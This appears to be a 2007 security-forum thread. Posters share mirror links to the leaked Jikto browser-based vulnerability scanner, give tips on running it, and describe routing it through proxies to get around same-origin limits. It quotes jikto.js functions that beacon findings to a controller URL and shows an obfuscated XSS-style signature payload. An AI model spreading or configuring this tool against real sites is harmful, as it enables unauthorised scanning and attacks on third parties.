Hi guys,

I was listening to the latest Security Now! (with Steve Gibson; hey, this guy has good intentions :P) and he mentioned about jikto source code being leaked out.
I would like to take a look. Anybody has a copy?

Is this it? [www.pentest.it]

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

[www.pentest.it] other files

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

damnit - down already. did you backup the files?

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

I'd like to see the source also. Anyone have it?

1st of april??

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

I have a backup I thought they might take it down. Seeing they were asking people to take it off their sites.

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

[URL REMOVED] Please look elswhere

btw this is not an April Fools Joke. Tell if if server is not responding or not. Its on my home server so kinda unreliable. Make backup because will take server down after you check.

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."



Edited 1 time(s). Last edit at 04/06/2007 01:04AM by CrYpTiC_MauleR.

Fukken Saved! I was wondering when the actual source would be available as it was supposed to be out around the 25th, and I knew they had already presented it to the public.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
[www.awesomeandrew.net]

Anyone else want a copy before I take it down?

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

Interesting how the jikto control was changed! Already being used by a number of people I see.

- RSnake
Gotta love it. http://ha.ckers.org

Taking my server down, anyone want copy PM me.

UPDATE: please read [sla.ckers.org]

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."



Edited 1 time(s). Last edit at 04/06/2007 01:05AM by CrYpTiC_MauleR.

Here are the slides
[www.spidynamics.com]

Anyone playing with this tool? I need some guidance :)

I did some tests. What problems do you have?

Well there are four files, I just coded a quick php file to replace control control.txt and changed the var GUIURL.

I'm trying without using a "proxy", I'm scanning a site in the same domain (To bypass the Same Origin Policy)... But I get this weird javascript errors

Is there any chance that I can see a working demo blad3? Just to see how your are testing

wtf?
[blogs.zdnet.com]

Ryan Naraine Wrote:
-------------------------------------------------------
> The code has since been posted to the Sla.ckers.org forum.
> Hacker RSnake discusses nippets of the code, which can be
> used to hunt for common security holes and then connect
> back to its controller for instructions on which Web sites
> to hit and >which flaws to look for.

Hahahaha...



Edited 1 time(s). Last edit at 04/02/2007 02:38PM by busin3ss.

busin3ss, I'm testing on localhost like you did.
You are most definitely doing something wrong, maybe didn't used rot13 or entered some bad URL or path or ?
The script is working pretty nice, I'm watching the requests/responses with Firebug.
You can even insert breakpoints and debug the code if you want. Firebug rocks!

Downloading Firebug right know...

For those who want to download the source code (Since all mirrors are offline):

[busin3ss.name]



Edited 1 time(s). Last edit at 04/02/2007 03:03PM by busin3ss.

>> wtf?
>> [blogs.zdnet.com]

oops

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."



Edited 1 time(s). Last edit at 04/02/2007 03:03PM by CrYpTiC_MauleR.

You can run it against localhost sites to test. You'll need to edit the sendRequest() function. The global variable "prefix" holds the URL prefixing for the proxying site. The code in the isLinkgood() function should prevent Jikto from getting out of control and scanning pages that aren't on localhost

Doesn't really do anything, I change the URL and nothing really occurs. Loads the site in an iframe and...nothing.

I missed the download window. Anyone has the whole lot available for me, pls?

For those with reading disablilites:
[busin3ss.name]

Greetings,
.mario

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>



Edited 1 time(s). Last edit at 04/03/2007 04:16PM by .mario.

Note to everyone who comes to this post PMing me I am not responding to PMs for Jikto source anymore. If you can't be smart and use Google to find mirrors or even bother to read the posts on this page which clearly provides a working link to a copy of Jikto then I will ignore you. Come on people do we need our hands held for everything?

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."



Edited 1 time(s). Last edit at 04/06/2007 01:06AM by CrYpTiC_MauleR.

@CM

Edit the post? ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Mirror or Jikto -> [busin3ss.name]

Heh hopefully they know how to click a link. I mean the amount of people who PMed me even after you posted the link was ridiculous. Either they can't read or don't know how to use Google. I was asking myself this, if they cant even Google or read this page then how will they know how to use Jikto? I say someone make a post with links to known mirrors a sticky.

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

I got jikto and everything

I edited the jikto.js to direct to my control.txt

the-cloak banned me within seconds so im using google translate even though im testing pages in the same domain

with firebug i can see for example
[www.testdomainiamusing.com]

looking at the code in jikto.js:

function reportURL(method, url) {
var i = new Image();
i.src = GUIURL + "1&url=" + escape(url) + "&method=" + escape(method);
}

function reportVuln(method, url, sev, title, req, resp) {
var i = new Image();
i.src = GUIURL + "2&url="

which means that unless I see "http://www.testdomainiamusing.com/jikto/control.txt2&url="
it did not find a vulnerability

i guess that's the way to do it without a controller, but someone above me said they wrote up a controller, can you post the source to the controller?

or maybe im using the tool incorrectly?